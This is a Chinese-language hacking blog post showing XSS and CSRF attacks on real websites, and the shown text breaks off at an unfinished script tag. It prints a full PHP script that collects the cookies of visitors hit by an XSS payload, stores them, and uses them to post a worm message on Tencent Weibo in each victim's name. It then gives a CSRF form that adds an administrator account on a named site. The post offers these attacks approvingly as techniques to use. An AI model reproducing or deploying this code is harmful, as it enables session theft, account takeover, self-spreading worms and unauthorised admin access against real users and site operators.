朋友做了一件搞笑的事:挖了一个站的Csrf 0day,硬是带人家站加了友情链接。

 如今仍很多人没有意识到XSS的威力,他们会说,不就弹个窗么。那好吧,就弹个窗。

 Web2.0时代将是XSS的时代,各种XSS引发的淫荡招数将会越来越多,层出不穷,不信走着瞧。

例1 (php之术)

发视频处插如下代码

http://www.tudou.com/programs/view/TLpmMpTY0eY/">  //读cookie转到php里,没啥好讲的

0kee.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

 

   
   
   
   
  1. ob_start(); 
  2. $url = 't.qq.com'
  3. $cookie=$_GET['cookie']; 
  4. $randnum=rand();//这边的随机数我不知道有何用,我还特地去用腾讯微博抓包了下发现没这项,然后viewmode=0,不过这与主题无关 
  5. $cookie1=$cookie."\r\n\r\n"
  6. fputs(fopen('a.txt','a+'),$cookie1); //写到a.txt里,,留个纪念 
  7. $sock = fsockopen("$url", 80, $errno$errstr, 30); 
  8. if (!$sockdie("$errstr ($errno)\n"); 
  9. $data = "content=http://url.cn/1FDpEd hacked!! xss worm test~~".$randnum."&pic=&countType=&viewModel=1"
  10. fwrite($sock"POST http://$url/publish.php HTTP/1.1\r\n"); //这个publish.php是腾讯的发微博的php 
  11. fwrite($sock"Accept: */*\r\n"); 
  12. fwrite($sock"Referer: http://0kee.com\r\n"); 
  13. fwrite($sock"Accept-Language: zh-cn\r\n"); 
  14. fwrite($sock"Content-Type: application/x-www-form-urlencoded\r\n"); 
  15. fwrite($sock"Accept-Encoding: gzip, deflate\r\n"); //客户端浏览器(我的是IE8),提交包头里会有用gzip压缩 
  16. fwrite($sock"User-Agent: Mozilla\r\n"); 
  17. fwrite($sock"Host: $url\r\n"); 
  18. fwrite($sock"Content-Length: ".strlen($data)."\r\n"); 
  19. fwrite($sock"Connection: Keep-Alive\r\n"); 
  20. fwrite($sock"Cache-Control: no-cache\r\n"); 
  21. fwrite($sock"Cookie:".$cookie."\r\n\r\n"); 
  22. fwrite($sock$data); //上头php代码都是post发数据的老一套 
  23. $headers = ""
  24. while ($str = trim(fgets($sock, 4096))) 
  25.      $headers .= "$str\n"
  26. echo "\n"
  27. $body = ""
  28. while (!feof($sock)) 
  29.      $body .= fgets($sock, 4096); 
  30. fclose($sock); 
  31. Header("Location: http://t.qq.com/txsser");  //作者装x了,唉 
  32. ob_end_flush(); 
  33. ?> 

记得以前校内就有过类似事件,QQ最起码应该晓得过滤<>啊..晕

另一个例子(加管理员之术):

首先拥有一个自己可控的网站,然后构造表单:

 

   
   
   
   
  1. <html> 
  2. <form method="post" action="http://www.stuhack.com/admin/Admin_Admin.asp?" name="form1"> 
  3. <input name="UserName" value="test">     
  4. <input name="Action" type="hidden" id="Action" value="SaveAdd"> 
  5. <input name="AddUser" value="test">     
  6. <input type="password" name="Password" value="123456789">     
  7. <input type="password" name="PwdConfirm" value="123456789">  
  8. <input name="Purview_0" type="radio" value="1" onClick="PurviewDetail.style.display='none'" checked>  
  9. form> 
  10. <mce:script type="text/javascript">